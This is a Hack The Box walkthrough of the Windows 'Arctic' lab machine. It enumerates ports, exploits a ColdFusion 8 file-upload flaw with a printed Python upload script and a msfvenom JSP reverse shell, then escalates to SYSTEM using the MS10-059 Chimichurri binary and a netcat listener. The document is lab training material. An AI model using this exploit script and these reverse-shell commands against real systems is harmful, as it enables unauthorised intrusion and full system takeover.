Arctic - Hack The Box

Cracking the Arctic Box.

tl;dr

• Adobe ColdFusion 8
• MS10-059
• CVE-2009-2265

Solved by: 7h3M0nk

This is a Windows Box with IP 10.10.10.11

Enumeration

Doing a Port Scan to check for open ports.

┌──(kali㉿kali)-[~/…/Artic/recon/10.10.10.11/nmap]
└─$ cat Basic_10.10.10.11.nmap 
# Nmap 7.91 scan initiated Tue Jan 26 00:15:51 2021 as: nmap -Pn -sCV -p135,8500,49154 -oN nmap/Basic_10.10.10.11.nmap 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.18s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 26 00:18:11 2021 -- 1 IP address (1 host up) scanned in 140.47 seconds
                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/…/Artic/recon/10.10.10.11/nmap]
└─$ cat Quick_10.10.10.11.nmap 
# Nmap 7.91 scan initiated Tue Jan 26 00:15:36 2021 as: nmap -Pn -T4 --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit --open -oN nmap/Quick_10.10.10.11.nmap 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.18s latency).
Not shown: 997 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

# Nmap done at Tue Jan 26 00:15:50 2021 -- 1 IP address (1 host up) scanned in 13.99 seconds

There is an msrpc running at 135 and fmtp( Flight Message Transfer Protocol ) at port 8500 and something at port 49154.

This is the first time I am coming across the fmtp protocol. Checking it out.

Adobe Cold Fusion 8. Again, seeing this for the first time.

Checking for known vulnerabilities, I found a gem in HackTheBox forum.

Exploit

There is a file upload vulnerability in ColdFusion 8. The above script allows me to send a jsp file into /userfiles/file/ directory.

Creating a jsp reverse shell and sending it to the server + Running a listner at 443.

┌──(kali㉿kali)-[~/HackTheBox/Artic/exploit]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=443 -f raw > jspshell.jsp
Payload size: 1496 bytes

┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.11] 49181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\ColdFusion8\runtime\bin

Yeah! That worked.

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users

22/03/2017  09:00 ��    <DIR>          .
22/03/2017  09:00 ��    <DIR>          ..
22/03/2017  08:10 ��    <DIR>          Administrator
14/07/2009  06:57 ��    <DIR>          Public
22/03/2017  09:00 ��    <DIR>          tolis
               0 File(s)              0 bytes
               5 Dir(s)  33.183.768.576 bytes free

C:\Users>cd tolis\Desktop
cd tolis\Desktop

C:\Users\tolis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users\tolis\Desktop

22/03/2017  09:00 ��    <DIR>          .
22/03/2017  09:00 ��    <DIR>          ..
22/03/2017  09:01 ��                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  33.183.768.576 bytes free

C:\Users\tolis\Desktop>type user.txt

The user tolis doesn’t have admin permissions, need to do PrivEsc. Getting the system info, to check with windows-kernal-exploits.

C:\Users\tolis\Desktop>systeminfo
systeminfo


Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45 ��
System Boot Time:          18/2/2021, 12:30:14 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
                           [02]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 316 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.243 MB
Virtual Memory: In Use:    804 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

Got the system info.

┌──(kali㉿kali)-[~/GitRepos/windows-kernel-exploits/win-exp-suggester]
└─$ ./windows-exploit-suggester.py --database 2021-02-15-mssb.xls --systeminfo systeminfo     
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

There are multiple methods to do PrivEsc here, I have tried all but only one works MS10-59. There is already a complied version in the exploit directory but that didn’t work.
Found another compiled binary from egre55. This works!

Let’s move to the actual method I followed.

The file upload vuln got me thinking, if I am able to change the file type as binary in File upload script. Then the binary can be send to the host using the same method.

Changing the MIME type to application/octet-stream in the FileUpload script and a couple more stuff. This will allow us to upload binary files.

Updated script.

import requests, sys

try:
    ip = sys.argv[1]
    port = sys.argv[2]
    if len(sys.argv) == 5:
        path = sys.argv[3]
        with open(sys.argv[4], 'r') as payload:
            body=payload.read()
    else:
        path = ""
        with open(sys.argv[3], 'r') as payload:
            body=payload.read()
except IndexError:
    print 'Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/coldfusion] </path/to/payload.exe>'
    print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.exe'
    sys.exit(-1)

basepath = "http://" + ip + ":" + port + path

print 'Sending payload...'

try:
    req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exploits.exe%00", files={'newfile': ('exploit.txt', body, 'application/octet-stream')}, timeout=30)
    if req.status_code == 200:
        print 'Successfully uploaded payload!\nFind it at ' + basepath + '/userfiles/file/exploits.exe'
    else:
        print 'Failed to upload payload... ' + str(req.status_code) + ' ' + req.reason
except requests.Timeout:
    print 'Failed to upload payload... Request timed out'

Trying it out!

┌──(kali㉿kali)-[~/HackTheBox/Artic/exploit]
└─$ python FileUpload.py 10.10.10.11 8500 Chimichurri.exe                       
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Sending payload...
Successfully uploaded payload!
Find it at http://10.10.10.11:8500/userfiles/file/exploits.exe
                                                                 

The file is stored in C:\ColdFusion8\wwwroot\userfiles\file directory. Running the exploit with args IP and Port of the local system, to get a reverse shell with root access.

C:\ColdFusion8\wwwroot\userfiles\file>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\ColdFusion8\wwwroot\userfiles\file

18/02/2021  12:32 ��    <DIR>          .
18/02/2021  12:32 ��    <DIR>          ..
18/02/2021  12:31 ��             1.496 exploit.jsp
18/02/2021  12:32 ��           784.384 exploits.exe
               2 File(s)        785.880 bytes
               2 Dir(s)  33.184.165.888 bytes free

C:\ColdFusion8\wwwroot\userfiles\file>exploits.exe 10.10.14.15 53
exploits.exe 10.10.14.15 53

/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>

And that worked!!

┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 53                                                                                          1 ⨯
[sudo] password for kali: 
listening on [any] 53 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.11] 49201
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\wwwroot\userfiles\file>whoami
whoami
nt authority\system

C:\ColdFusion8\wwwroot\userfiles\file>cd C:\
cd C:\

C:\>cd Users\Administrator\Desktop
cd Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt

Solved Arctic. Onto the next one :)